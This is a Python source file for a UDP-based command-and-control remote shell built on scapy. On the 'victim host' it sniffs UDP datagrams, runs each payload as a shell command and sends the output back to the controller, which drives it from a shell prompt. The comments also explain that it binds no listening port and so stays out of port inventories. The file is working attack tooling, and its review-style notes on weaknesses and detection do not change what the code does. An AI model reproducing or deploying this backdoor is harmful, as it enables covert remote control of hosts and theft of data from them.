udp_shell.py
from scapy.all import sniff, UDP, IP,send,Raw
import os
import random
import argparse
from multiprocessing import Process
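# Needs root to run (scapy captures and injects raw packets), although it does not open a listening port.
# Because no port is bound, a listening-port inventory will not show it; the packet-capture socket held by the process will.
# The listener must be started first, on the victim host.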
# Command-line interface. --src and --des are the two addresses the packet
# handler compares incoming datagrams against; they act as a filter only and
# do not authenticate the peer.
parser = argparse.ArgumentParser(description="")
parser.add_argument(
    "-s", "--src",
    type=str,
    required=True,
    help="data is coming from (remote ip )",
)
parser.add_argument(
    "-d", "--des",
    type=str,
    required=True,
    help="data is coming to (local ip) ",
)
parser.add_argument(
    "-v", "--verbose",
    action="store_true",
    help="for verbose info ",
)
# --listen selects the command-executing role (see handle_operation).
parser.add_argument(
    "-l", "--listen",
    action="store_true",
    help="To be a listener ",
)
# Parsed at import time: every function below reads this module-level object.
args = parser.parse_args()
def sniffer():
    """Capture UDP traffic and pass each packet to process_packet.

    The capture filter is just "udp", so every UDP datagram scapy sees is
    inspected; the address match happens later in process_packet. No count or
    timeout is given, and store=0 asks scapy not to keep captured packets.
    """
    print("Starting UDP packet sniffer...")
    capture_options = {
        "filter": "udp",
        "prn": process_packet,
        "store": 0,
    }
    sniff(**capture_options)
def send_back(sendinfo):
    """Build one IP/UDP datagram from *sendinfo* and hand it to scapy's send().

    Args:
        sendinfo: dict with the keys "dip" (destination address), "sp" and
            "dp" (UDP source and destination port) and "reply" (payload).

    The payload is placed in the datagram unchanged: nothing here encrypts or
    signs it, so commands and their output are readable by anything that can
    see the traffic (packet capture, IDS payload rules).
    """
    ip_header = IP(dst=sendinfo["dip"])
    udp_header = UDP(sport=sendinfo["sp"], dport=sendinfo["dp"])
    body = Raw(load=sendinfo["reply"])
    send(ip_header / udp_header / body)
def packet_info(ip_layer, udp_layer):
    """Print the addresses and ports of a matched datagram (verbose mode).

    Args:
        ip_layer: object exposing ``src`` and ``dst``.
        udp_layer: object exposing ``sport`` and ``dport``.
    """
    rows = (
        ("Source IP", ip_layer, "src"),
        ("Destination IP", ip_layer, "dst"),
        ("Source Port", udp_layer, "sport"),
        ("Destination Port", udp_layer, "dport"),
    )
    print("\n--- UDP Packet ---")
    # Attributes are read one row at a time, in the order they are printed.
    for label, layer, attr in rows:
        print(f"{label}: {getattr(layer, attr)}")
def handle_operation(ip_layer, udp_layer):
    """Handle one datagram that already passed the address filter.

    The UDP payload is decoded as UTF-8 (undecodable bytes dropped, NUL
    bytes stripped from both ends) and printed. In listener mode the decoded
    text is then run as a shell command and its output is sent back to the
    sender; the literal payload ``exit`` stops the process instead.

    Args:
        ip_layer: IP layer of the datagram; ``src`` becomes the reply target.
        udp_layer: UDP layer of the datagram; its payload is the message.

    Review notes:
        * The only gate in front of the command execution below is the
          source/destination address comparison in process_packet. UDP is
          connectionless and the source address is not verified, so that
          comparison is a filter, not authentication.
        * Nothing is encrypted or integrity-protected: commands and output
          travel as plain text in UDP payloads.
        * Detection surface visible in this code: both reply ports are drawn
          from 50000-60000 for every reply, no socket is ever bound to them,
          and each command spawns a shell child of this Python process.
    """
    if args.verbose:
        packet_info(ip_layer, udp_layer)

    raw_bytes = bytes(udp_layer.payload)
    payload = raw_bytes.decode('utf-8', errors='ignore').strip("\0")
    print(f"\n[*] Result : {payload} ")

    # Built before the mode check, so both roles draw two random ports here.
    sendinfo = {
        "dip": ip_layer.src,
        "dp": random.randint(50000, 60000),
        "sp": random.randint(50000, 60000),
        "reply": "",
    }

    if not args.listen:
        # Controller side: the payload was a command result; nothing to send.
        return

    if payload == 'exit':
        print("[+]Stopping UDP C2...")
        # os._exit skips normal interpreter cleanup.
        os._exit(0)

    # SECURITY: network-supplied text goes straight to a shell via os.popen.
    # The pipe object is never closed explicitly.
    output_lines = os.popen(payload).readlines()
    if args.verbose:
        print(f"[*] Output: {output_lines}")
    sendinfo["reply"] = ''.join(output_lines)
    send_back(sendinfo)
def process_packet(packet):
    """Sniffer callback: forward datagrams exchanged with the configured peer.

    A packet is passed to handle_operation only when it carries both an IP
    and a UDP layer, its source address equals ``args.src`` and its
    destination address equals ``args.des``. Ports are not checked.

    Note that this address comparison is the sole admission check in the
    file; it relies on header fields that the sender controls.
    """
    if not (IP in packet and UDP in packet):
        # Ignore non-IP or non-UDP packets
        return

    ip_layer, udp_layer = packet[IP], packet[UDP]
    if ip_layer.src != args.src or ip_layer.dst != args.des:
        return
    handle_operation(ip_layer, udp_layer)
def main():
    """Start the sniffer in a child process and, unless listening, run the prompt.

    In listener mode the prompt loop is skipped and the function simply waits
    on the sniffer process. Otherwise every non-empty line typed at the
    prompt is sent to ``args.src`` as a UDP payload; ``exit`` is sent as well
    and then ends the session by terminating the sniffer.

    The source and destination ports are chosen once here, from 50000-60000,
    and reused for every datagram the prompt sends.
    """
    sniffing = Process(target=sniffer)
    sniffing.start()
    print("[+]UDP C2 started!")

    sendinfo = {
        "dip": args.src,
        "dp": random.randint(50000, 60000),
        "sp": random.randint(50000, 60000),
        "reply": "",
    }

    while not args.listen:
        msg = input("[+] Shell: ")
        if not msg:
            # Empty line: prompt again without sending anything.
            continue

        sendinfo["reply"] = msg
        send_back(sendinfo)

        if msg == 'exit':
            print("[+]Stopping UDP C2...")
            sniffing.terminate()
            break

    # Listener mode falls straight through to here and waits on the sniffer.
    sniffing.join()
# Run main() only when executed as a script. The argparse call near the top of
# the file is outside this guard and still runs when the module is imported.
if __name__ == "__main__":
    main()